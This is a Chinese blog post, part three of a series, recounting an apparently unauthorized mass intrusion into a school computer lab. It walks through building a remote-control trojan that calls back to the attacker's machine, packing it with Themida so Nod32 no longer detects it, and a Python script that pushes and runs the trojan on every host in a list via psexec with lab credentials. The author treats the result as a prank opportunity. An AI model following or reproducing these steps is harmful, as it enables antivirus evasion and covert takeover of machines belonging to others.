记一次突破cisco网段限制跨机房使用python批量入侵(3)

写在前面:有某某看了我这个系列的第一篇说我不是原创。我只想说,你懂个蛋。

继续我们的步伐。


14.把鼠标放到右下角Nod32的小图标上,看到Nod32的病毒库版本是20120319(这实验中心的老师太不负责了)。而我用的是上兴远控2014版。按理说不应该被杀,想想当时Nod32就有启发式杀毒,那加一个反调试的压缩壳会不会就直接过掉了呢?

15.先禁用Nod32的实时文件监控,打开上兴2014,看看看下本地IP 192.168.5.215(由于文章不是同一时间写出来的,电脑换了,所以IP也换了),因为机房有还原卡,配置客户端的时候不用添加服务什么的重启上线功能。上线地址为192.168.5.215,生产木马名为server.exe(想起来当年的灰鸽子)。

16.打开 Themida,把server.exe拖进来,选 Protect Option,把 Deliphi/BCB Form Protection 和 VMWare/Virtual PC 两个勾去掉(没啥用我感觉),然后点Protect

 。

17.加完了壳,右键杀毒下,发现成功不杀了。启用Nod32的实时文件监控,本地运行加壳后的木马,Nod32无提示木马上线。

18.写python逐行读取list,批量执行psexec。这里就用单线程(记得以前多线程好像有问题)。

python代码

import os

for line in open("E:\\list.txt"): #文章(2)里面跑出来的存活主机列表
	line=line.strip('\n')
	cmd = "psexec.exe \\\\"+line+" -u XXXX -P XXXXXXXX@520! -c server.exe" #账号密码就文字马赛克了。
	os.system(cmd)
	if not line:
		break

19.把server.exe和psexec.exe放在与脚本同一个目录下,等待脚本运行完毕。

20.效果图(233333)

21.有了远控权限,想要恶作剧比如全部机房一起弹窗之类的随你好了。



后记:我第一次接触远控是初中(2007年),当时灰鸽子横行,还有Ghost啊,白金啊,ruser啊一堆堆的远控。一天抓十几个肉鸡然后刷个QQ钻感觉很幸福。如今时代不一样了,价值观也不同了。我不禁想起了Jophy的说说。


本文由Hack Blog原创,如需转载注明原文链接

作者:test 分类:漏洞 浏览:2142 评论:2
留言列表
访客
访客 唉我哪辈子能学会擦擦擦唉  回复
访客小小民
访客小小民 同上  回复
发表评论
来宾的头像